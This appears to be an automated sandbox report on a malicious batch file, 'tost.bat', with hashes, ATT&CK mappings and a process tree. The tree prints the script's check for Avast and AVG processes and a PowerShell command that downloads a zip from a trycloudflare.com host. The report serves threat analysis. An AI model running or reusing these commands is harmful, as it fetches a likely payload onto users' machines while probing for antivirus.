5153a4d8ee131d9edb35829e1326f08c19d718c572a9274eacb7430896ec5112

General

Target

tost.bat
Size

23KB
MD5

c26f41f48d02002dec3ad4e5156bfdda
SHA1

03abcb03be3d39da5e513f4f7056df179047eb2c
SHA256

5153a4d8ee131d9edb35829e1326f08c19d718c572a9274eacb7430896ec5112
SHA512

ed079f1e71aeaa49593c4dbdb3a916bc86daf5e0f2071772854e50d3e2d9690bc4957e4c65c09498bfa76aaa103aa99ab76fb893f2118e757ed8ecb4d1a3b3ba
SSDEEP

384:gTYcpQyuPmhDGEhtKCiFl8sutSjJ7RWGFX8qQt4TdKtyCHIbRJGE2fl08bcOB3wO:gTYcpQyuPmhDGEhtKC1snbWGWdIKZHIQ

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2880	powershell.exe
2676	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
1684	tasklist.exe
2836	tasklist.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2880	powershell.exe
2676	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

tasklist.exetasklist.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1684	tasklist.exe
Token: SeDebugPrivilege	2836	tasklist.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 2344 wrote to memory of 1684	2344	cmd.exe	31
PID 2344 wrote to memory of 1684	2344	cmd.exe	31
PID 2344 wrote to memory of 1684	2344	cmd.exe	31
PID 2344 wrote to memory of 2656	2344	cmd.exe	32
PID 2344 wrote to memory of 2656	2344	cmd.exe	32
PID 2344 wrote to memory of 2656	2344	cmd.exe	32
PID 2344 wrote to memory of 2836	2344	cmd.exe	34
PID 2344 wrote to memory of 2836	2344	cmd.exe	34
PID 2344 wrote to memory of 2836	2344	cmd.exe	34
PID 2344 wrote to memory of 2840	2344	cmd.exe	35
PID 2344 wrote to memory of 2840	2344	cmd.exe	35
PID 2344 wrote to memory of 2840	2344	cmd.exe	35
PID 2344 wrote to memory of 2880	2344	cmd.exe	36
PID 2344 wrote to memory of 2880	2344	cmd.exe	36
PID 2344 wrote to memory of 2880	2344	cmd.exe	36
PID 2344 wrote to memory of 2676	2344	cmd.exe	37
PID 2344 wrote to memory of 2676	2344	cmd.exe	37
PID 2344 wrote to memory of 2676	2344	cmd.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tost.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:2656
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:2840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://request-fr-geology-nobody.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://request-fr-geology-nobody.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

1

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
552bd9df2f9e79a2c064c11457a63b02

SHA1
5ed7d9241105e420b0fe66491852a84e8a99b893

SHA256
6dc1d68300dfbbf901649dcc4b2b39e9d57d24ff27df21dfe73fd093a77f1c9a

SHA512
1c6b08ffacd77f85a1d345833af98538e340ad661c6fcfaf4602b1fbabadebd83fe07bb2a0e920ebf39a9c71f9cc148ae9b887f8fda813f1224d00238b22ff21

Download Submit
memory/2676-17-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2676-18-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2880-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

Filesize
4KB

Download
memory/2880-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2880-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2880-7-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-10-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-11-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads